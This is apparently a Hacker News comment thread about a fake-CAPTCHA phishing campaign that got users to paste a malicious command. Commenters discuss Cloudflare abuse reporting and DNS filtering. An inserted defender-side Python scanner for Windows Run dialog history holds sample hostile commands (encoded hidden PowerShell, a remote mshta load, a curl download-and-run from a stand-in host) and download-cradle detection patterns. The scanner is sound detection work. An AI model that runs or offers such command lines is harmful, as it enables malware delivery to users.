Comment by johnklos 10 months ago

Can be summarized with: Don't click on links in email.

So is github-scanner.com (and github-scanner.shop) still the same malicious party? It seems to be. Funny that their DNS is hosted by Cloudflare (who, famously, don't host anything, because they think we're all dumb). Cloudflare, who take responsibility for nothing, have no way to report this kind of abuse to them.

The domain which hosts the malware, 2x.si, both uses Cloudflare for DNS and is hosted by Cloudflare. At least it's possible to report this to Cloudflare, even though they rate limit humans and have CAPTCHAs on their abuse reporting forms.

Sigh. Thanks to Cloudflare, it's trivial these days to host phishing and malware.

poincaredisk 10 months ago

Cloudflare is way more responsive to abuse requests than 95% of country-level DNS registrars. I have experience working with both.

elashri 10 months ago

I don't know how effective or quick to respond they are, but there is a way to report malware [1].

Extracting from the page:

> Which category of abuse to select: Phishing & Malware

[1] https://www.cloudflare.com/trust-hub/reporting-abuse/

  • johnklos 10 months ago

    Cloudflare's abuse form will not let you submit the report if you don't include a URL that currently points to their network. There are no options for phishing / scam domains for which they're the registrar and/or DNS hosting.

    • ToValueFunfetti 10 months ago

      I haven't tested the form, but they do claim you can report abuse of the registrar with some of the options; perhaps they've changed it?

      Failing that:

      > If Cloudflare is listed as the registrar on an ICANN WHOIS listing, you also can email reports related to our registrar services to registrar-abuse@cloudflare.com

ipdashc 10 months ago

> Don't click on links in email.

Not saying you're wrong per se, but isn't it more so summarized with "don't fall for a 'CAPTCHA' that requires you to paste code into the window labeled 'This will run with administrative privileges'?"

This is more so a grumble than a serious comment on security, but agh, it's always bugged me that the metric for failing phishing tests is "clicked on any link in the email" and not, you know, entered credentials into the phish site, or downloaded and opened a file. Like, I get it, it's much easier to teach nontechnical users to simply not click bad links than that other stuff - and browser vulns do exist - but it still vaguely annoys me.

I feel like I've seen countless posts like this one that end in the user entering creds, giving the browser some weird permission, downloading some file (sometimes straight-up an executable), or in this case, running a command. I don't know if I've seen a single one that ends in "and then they clicked the link and it popped a browser 0-day and that was the end of that".

Web browsers are a wide attack surface, yes, but they're also... intended for browsing the Internet. Most people click through links pretty haphazardly as they're doing work or researching a topic. Defense in depth and all, but I feel like a security policy that holds "don't visit any evil websites ever" as a core tenet is pretty flawed.
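As an added defender-side example (not from the thread or any commenter), here is a Python scan over constructed Windows Run dialog history (the RunMRU registry key) that flags the pattern ipdashc describes: a pasted "verification" command handed to PowerShell, mshta or cmd with encoding, hidden-window or download arguments. The sample entries, the LOLBin list and the heuristics are my own assumptions, not anything the thread documents.

```python
import re
from dataclasses import dataclass, field

# Constructed sample of Run dialog history (hypothetical values, not from the thread).
# Windows stores each Run command under HKCU\...\Explorer\RunMRU as "<command>\1";
# MRUList lists the value names most-recent-first.
SAMPLE_RUNMRU = {
    "a": r"notepad\1",
    "b": r"powershell -w hidden -enc QQBCAEMA\1",
    "c": r"mshta https://example.invalid/verify.hta\1",
    "d": r"cmd /c curl -o %TEMP%\x.exe https://example.invalid/x && %TEMP%\x.exe\1",
    "e": r"calc\1",
    "MRUList": "dcbea",
}

# Interpreters and fetch tools that a pasted "verification" one-liner is usually handed to (assumed list).
LOLBINS = {"powershell", "pwsh", "mshta", "cmd", "wscript", "cscript", "rundll32", "regsvr32", "curl", "bitsadmin", "certutil"}

SUSPICIOUS = [
    (re.compile(r"(?<!\S)-(e|ec|enc|encodedcommand)\b", re.I), "encoded PowerShell command"),
    (re.compile(r"(?<!\S)-(w|windowstyle)\s+hidden\b", re.I), "hidden window"),
    (re.compile(r"https?://", re.I), "remote URL typed into Run dialog"),
    (re.compile(r"\b(iex|invoke-expression|downloadstring|invoke-webrequest|curl|bitsadmin)\b", re.I), "download-and-execute cradle"),
    (re.compile(r"\bmshta\b", re.I), "mshta script host"),
]

@dataclass
class Finding:
    name: str                  # RunMRU value name
    command: str
    reasons: list = field(default_factory=list)

def parse_runmru(values):
    """Yield (value name, command) most-recent-first, stripping the trailing '\\1'."""
    for name in values.get("MRUList", ""):
        raw = values.get(name, "")
        yield name, raw[:-2] if raw.endswith("\\1") else raw

def scan_runmru(values):
    """Flag Run dialog entries that launch a LOLBin with paste-and-run style arguments."""
    findings = []
    for name, cmd in parse_runmru(values):
        exe = cmd.split()[0].lower().rsplit("\\", 1)[-1].removesuffix(".exe") if cmd else ""
        if exe not in LOLBINS:
            continue
        reasons = [why for pat, why in SUSPICIOUS if pat.search(cmd)]
        if reasons:
            findings.append(Finding(name, cmd, reasons))
    return findings
```

On a real host the dictionary would be populated from the registry (e.g. via winreg) per user profile; plain `notepad` and `calc` entries pass, while the three interpreter launches are reported with the reasons that fired.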

spoonfeeder006 10 months ago

So how do you not click links to confirm your email for a new account?

Rather, one could use Qubes OS and only open links in disposable VMs, and never enter info beyond that.

That's basically what I do when I get emails to confirm my email address for a new account.

One can't always avoid clicking links, can one?

  • bentcorner 10 months ago

    > So how do you not click links to confirm your email for a new account?

    Fair question, but the "don't click links in email" is for emails that you don't expect. And sure, that's an unsatisfying answer because it's hard to communicate this wisdom to your grandmother.

    I think the best answer is defense-in-depth. Ensure you use updated email clients, browsers, and OS, and employ a DNS blocker like a Pi-hole or an equivalent public service.

    For less-savvy people a device like an iPad or Chromebook can be a reasonable defense.

    • hunter2_ 10 months ago

      If I'm being honest, "don't click links in email unless you were expecting that particular email message" seems easier for grandma than "update x, y, and z, and use Pi-hole" unless you want to administer her network and devices. But maybe you're saying that an iPad/Chromebook can mitigate all of the above needs? A little bit.

      Anyway, while I haven't heard of any cases yet, it wouldn't surprise me if senders of phishing email someday manage to deliver messages shortly after detecting some traffic (DNS lookup?) that you legitimately make with the entity the email is spoofing. Then you're expecting it, roughly.

      • johnklos 10 months ago

        It is a bit easier, at least. My almost 90 year old Mom now knows to be suspicious of email and to not believe email unless she has a reason to think she should be getting it.

        To be fair about setting up a Pi-hole or some other form of DNS filtering, that's something that the network administrator should do, not individual users. It's a shame that it's still not trivial: companies that make NAT routers resist building in things that they don't completely control, so a configuration page for Pi-hole in your NAT router's web interface likely isn't coming soon. I hope that changes.

        Mom also understands that someone taking over her Nextdoor account would be a nuisance, whereas someone taking over her banking account would be significantly more problematic, so the more important something is, the more time she'll take to ascertain its authenticity.

        I practice explaining these things because I do it often. One interesting observation is that Mom believes me, so she does the things I suggest, whereas younger people think they know better, so they generally don't put much energy into my suggestions. I'm working on ways of showing people that they're not necessarily safe because they're "doing the same things they've always done, and nothing bad has happened yet".

        • hunter2_ 10 months ago

          > a configuration page for Pi-hole in your NAT router's web interface likely isn't coming soon. I hope that changes.

          In the meantime, the majority of routers do allow you to specify the DNS resolver instead of using whatever it learns via WAN DHCP, so you could put in a filtered public resolver (as opposed to your own Pi-hole instance), which gives pretty similar results if you don't need to whitelist anything. Plus, you can do the same on mobile devices that roam beyond that router (and avoid VPN through said router). I've been using dns.adguard-dns.com (94.140.14.14 and 94.140.15.15) [0]. They were founded in Moscow but now operate out of Cyprus (EU), and I don't have much of a reason to trust any other DNS operator more than them.

          [0] https://adguard-dns.io/en/public-dns.html ("method 2")